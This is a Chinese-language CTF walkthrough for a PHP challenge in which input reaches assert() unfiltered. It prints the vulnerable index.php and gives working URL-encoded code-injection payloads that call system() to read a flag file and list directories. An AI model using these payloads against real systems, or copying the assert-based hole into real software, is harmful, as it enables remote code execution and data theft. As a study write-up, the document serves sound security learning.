進入題目,
emmm,scratch
F12,看到提示
about里有git,並且有git倉庫,可以githack dump下來,打開index.php
<?php if (isset($_GET['page'])) { $page = $_GET['page']; } else { $page = "home"; } $file = "templates/" . $page . ".php"; // I heard '..' is dangerous!
assert("strpos('$file', '..') === false") or die("Detected hacking attempt!"); // TODO: Make this look nice
assert("file_exists('$file')") or die("That file doesn't exist!"); ?>
<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<title>My PHP Website</title>
<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/css/bootstrap.min.css" />
</head>
<body>
<nav class="navbar navbar-inverse navbar-fixed-top">
<div class="container">
<div class="navbar-header">
<button type="button" class="navbar-toggle collapsed" data-toggle="collapse" data-target="#navbar" aria-expanded="false" aria-controls="navbar">
<span class="sr-only">Toggle navigation</span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
<span class="icon-bar"></span>
</button>
<a class="navbar-brand" href="#">Project name</a>
</div>
<div id="navbar" class="collapse navbar-collapse">
<ul class="nav navbar-nav">
<li <?php if ($page == "home") { ?>class="active"<?php } ?>><a href="?page=home">Home</a></li>
<li <?php if ($page == "about") { ?>class="active"<?php } ?>><a href="?page=about">About</a></li>
<li <?php if ($page == "contact") { ?>class="active"<?php } ?>><a href="?page=contact">Contact</a></li>
<!--<li <?php if ($page == "flag") { ?>class="active"<?php } ?>><a href="?page=flag">My secrets</a></li> -->
</ul>
</div>
</div>
</nav>
<div class="container" style="margin-top: 50px">
<?php require_once $file; ?>
</div>
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/1.12.4/jquery.min.js" />
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/3.3.7/js/bootstrap.min.js" />
</body>
</html>
看到assert我就知道了,看來是我沒接觸到的知識點,雖然知道assert,但是這道題不知道該怎么下手,查看了WP后,發現因為page獲取到的參數沒人任何過濾
$file = "templates/" . $page . ".php";
因為后面是assert,所以可以可以傳入system函數,通過閉合來執行system
assert是把其參數當做php語句進行執行,既然file和我們的輸入有關,而且又在strops函數之中,來個閉合繞過:
構造 about.php', '123') === false and system('cat templates/flag.php') and strpos('templates/flag,這樣就可以看到flag.php的內容了,urlencode之后傳參:
/?page=about.php%27%2c+%27123%27)+%3d%3d%3d+false+and+system(%27cat+templates%2fflag.php%27)+and+strpos(%27templates%2fflag
---------------------
作者:Flower__World
來源:CSDN
原文:https://blog.csdn.net/zz_Caleb/article/details/89318443
版權聲明:本文為博主原創文章,轉載請附上博文鏈接!
這里的知識點就是雙引號內的變量可以替換,並且assert的全部字符參數可以作為php代碼執行,所以執行了system('cat templates/flag.php')
但是看攻防世界里的wp中,傳的payload為'.system("cd ../../../; ls -lA;").' 時,就可以列出東西,呢么直接page=%27.system(%27cat%20templates/flag.php%27).%27 然后右鍵源代碼就可以看到flag了。
assert弄了一晚上沒搞懂,反正自己試試了.在assert中的作用(發現像是連接函數一樣,每個都能夠執行),
發現可以執行system('dir'),我想知道assert的具體怎么實現這樣的,有知道為什么會這樣的老哥,告訴我下